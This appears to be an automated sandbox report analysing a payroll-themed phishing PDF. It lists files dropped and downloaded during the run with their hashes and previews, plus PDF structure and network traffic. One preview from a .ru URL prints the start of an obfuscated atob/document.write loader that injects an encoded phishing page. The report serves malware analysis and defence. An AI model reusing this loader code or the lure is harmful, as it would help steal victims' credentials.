                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                          Category:dropped
                                                                          Size (bytes):386528
                                                                          Entropy (8bit):7.9736851559892425
                                                                          Encrypted:false
                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                          Malicious:false
                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                          Category:dropped
                                                                          Size (bytes):758601
                                                                          Entropy (8bit):7.98639316555857
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                          MD5:3A49135134665364308390AC398006F1
                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                          Malicious:false
                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                          Category:dropped
                                                                          Size (bytes):1419751
                                                                          Entropy (8bit):7.976496077007677
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/M7ouWLYZwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RuWLYZwZGuGZn3mlind9i4ufFXpAXkru
                                                                          MD5:EC8D4FAB55F24C0E344D263724846C4A
                                                                          SHA1:5444D90F86D68A23AF7FB5434DEAE740D57D0312
                                                                          SHA-256:E489C11D38BFF8F1F51351BAEBEE9F723A5C036DA0B0CB9C82306251017054EE
                                                                          SHA-512:21018FD299944987654C202779C8E0185815868DE7179B814F145573EE8D45ACC33CA7E008CB23774C473DD7939E9D7D7C2E5A14E31D5EC62F7BFFDBBAB41F9A
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):48316
                                                                          Entropy (8bit):5.6346993394709
                                                                          Encrypted:false
                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                          Malicious:false
                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65447)
                                                                          Category:dropped
                                                                          Size (bytes):89501
                                                                          Entropy (8bit):5.289893677458563
                                                                          Encrypted:false
                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                          Malicious:false
                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48238)
                                                                          Category:downloaded
                                                                          Size (bytes):48239
                                                                          Entropy (8bit):5.343270713163753
                                                                          Encrypted:false
                                                                          SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                                                          MD5:184E29DE57C67BC329C650F294847C16
                                                                          SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                          SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                          SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                          Malicious:false
                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                          Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65447)
                                                                          Category:downloaded
                                                                          Size (bytes):89501
                                                                          Entropy (8bit):5.289893677458563
                                                                          Encrypted:false
                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                          Malicious:false
                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):937
                                                                          Entropy (8bit):7.737931820487441
                                                                          Encrypted:false
                                                                          SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                                          MD5:FC3B7BBE7970F47579127561139060E2
                                                                          SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                          SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                          SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                          Malicious:false
                                                                          URL:https://developers.cloudflare.com/favicon.png
                                                                          Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (65360)
                                                                          Category:downloaded
                                                                          Size (bytes):190935
                                                                          Entropy (8bit):4.659190710278366
                                                                          Encrypted:false
                                                                          SSDEEP:1536:oim9JGhcwCI+KTpN3MDgwC9YKXQNim9JGhcwCI+KTpN3MDgwC9YKXQfLBahLBar:09JWf+K9NcDx9JWf+K9NcDfGS
                                                                          MD5:2F997BB6D42671B74A71BEA737999EAC
                                                                          SHA1:46BAD9923D6899888C1484F1A5C1504ACBA069FB
                                                                          SHA-256:A7C1F825965E83F596DC1491478972142F2BC826DAA772E4F3E185E0A51AC68F
                                                                          SHA-512:E46BDC2698DAD7768438F00D12C2B298912C7DCAC879C60203741869E5E8541B931313D59C13720045DB9881F9331D3EED860EEAC03426BDEBE36A48A18FCC36
                                                                          Malicious:false
                                                                          URL:https://1c.hypernesdt.ru/A86bjH/
                                                                          Preview:<script>.nKofqABhyh = atob("aHR0cHM6Ly9pcklHLmh5cGVybmVzZHQucnUvQTg2YmpILw==");.HUVFceTZbh = atob("bm9tYXRjaA==");.BhVmLhnpbo = atob("d3JpdGU=");.if(nKofqABhyh == HUVFceTZbh){.document[BhVmLhnpbo](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IG13bEZEbFVmT0MgPSB7CiAgZ2V0KFFNQlh5Z2p2T3ksIHdvUmlGVWpKZmUpIHsKICAgIGNvbnN0IGxGQnZYT3FxTGcgPSBbLi4ud29SaUZVakpmZV0KICAgICAgLm1hcCh3amt4SVFRSXNvID0+ICsoJ+++oCcgPiB3amt4SVFRSXNvKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3QgR0JxWUtlc3dxaiA9IGxGQnZYT3FxTGcucmVwbGFjZSgvLns4fS9nLCBrckdXSWl
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):48316
                                                                          Entropy (8bit):5.6346993394709
                                                                          Encrypted:false
                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                          Malicious:false
                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):937
                                                                          Entropy (8bit):7.737931820487441
                                                                          Encrypted:false
                                                                          SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                                          MD5:FC3B7BBE7970F47579127561139060E2
                                                                          SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                          SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                          SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                          Malicious:false
                                                                          Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48238)
                                                                          Category:dropped
                                                                          Size (bytes):48239
                                                                          Entropy (8bit):5.343270713163753
                                                                          Encrypted:false
                                                                          SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                                                          MD5:184E29DE57C67BC329C650F294847C16
                                                                          SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                          SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                          SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                          Malicious:false
                                                                          Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          File type:PDF document, version 1.4, 0 pages
                                                                          Entropy (8bit):7.679900546712824
                                                                          TrID:
                                                                          • Adobe Portable Document Format (5005/1) 100.00%
                                                                          File name:Review Tempus wages bonus For 2025 Compensation Disbursement.pdf
                                                                          File size:50'744 bytes
                                                                          MD5:810621f02bc6f5704279e6f3fad07042
                                                                          SHA1:cb2a888e2721b7306fffae969b357eb8cb39535f
                                                                          SHA256:ecfacb0313c4817124af7722af1d39b9df92321148f11523ada6cb9903f28a70
                                                                          SHA512:09ad5d9fe7ae03c55c6b0e9b144b0903c5ca9675ee7a69b46f4b33cf82b84c74afb48d986c2da524b7fd01961e31e789f7ddd42afad55e12353cdff5f7bab3d8
                                                                          SSDEEP:768:nA0Ha9FDJoKWk0A6nHa9FDJoijxRnFZULMD0ONrH9jzCxGoPZZ:nHH4Joxk0A6nH4Jo0BNT9j2PZZ
                                                                          TLSH:95334ABAA8E5992CD8D14377B7F27B0966D9B5634BC82089F07805EEF4D6C19E312313
                                                                          File Content Preview:%PDF-1.4.1 0 obj.<<./Title (...A.d.o.b.e. .P.o.l.i.c.y. .U.p.d.a.t.e.s)./Creator (...w.k.h.t.m.l.t.o.p.d.f. .0...1.2...6)./Producer (...Q.t. .4...8...7)./CreationDate (D:20250304073853-05'00').>>.endobj.3 0 obj.<<./Type /ExtGState./SA true./SM 0.02./ca 1.
                                                                          Icon Hash:62cc8caeb29e8ae0

                                                                          General

                                                                          Header:%PDF-1.4
                                                                          Total Entropy:7.679901
                                                                          Total Bytes:50744
                                                                          Stream Entropy:7.767555
                                                                          Stream Bytes:43531
                                                                          Entropy outside Streams:5.153028
                                                                          Bytes outside Streams:7213
                                                                          Number of EOF found:1
                                                                          Bytes after EOF:
                                                                          NameCount
                                                                          obj53
                                                                          endobj53
                                                                          stream18
                                                                          endstream18
                                                                          xref1
                                                                          trailer1
                                                                          startxref1
                                                                          /Page1
                                                                          /Encrypt0
                                                                          /ObjStm0
                                                                          /URI2
                                                                          /JS0
                                                                          /JavaScript0
                                                                          /AA0
                                                                          /OpenAction0
                                                                          /AcroForm0
                                                                          /JBIG2Decode0
                                                                          /RichMedia0
                                                                          /Launch0
                                                                          /EmbeddedFile0
                                                                          IDDHASHMD5Preview
                                                                          68282828282828282dfb0d4eb91b19d7b140d7c35f779429e
                                                                          800000000000000000609038781fe48b7a6d6331b5de10471
                                                                          1282828282828282829cadf73900ad3e6c34f59e827924ad3c
                                                                          168282828282828282777618a2b03f022e2e0ae865c9e7dd15
                                                                          20828282828282828059dbb06377f258d53acba9a45fb23fe3

                                                                          Download Network PCAP: filteredfull

                                                                          • Total Packets: 515
                                                                          • 4803 undefined
                                                                          • 443 (HTTPS)
                                                                          • 80 (HTTP)
                                                                          • 53 (DNS)
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Mar 4, 2025 18:24:57.252432108 CET49673443192.168.2.6173.222.162.64
                                                                          Mar 4, 2025 18:24:57.252434969 CET49674443192.168.2.6173.222.162.64
                                                                          Mar 4, 2025 18:24:57.533817053 CET49672443192.168.2.6173.222.162.64
                                                                          Mar 4, 2025 18:25:00.789697886 CET49708443192.168.2.640.113.110.67
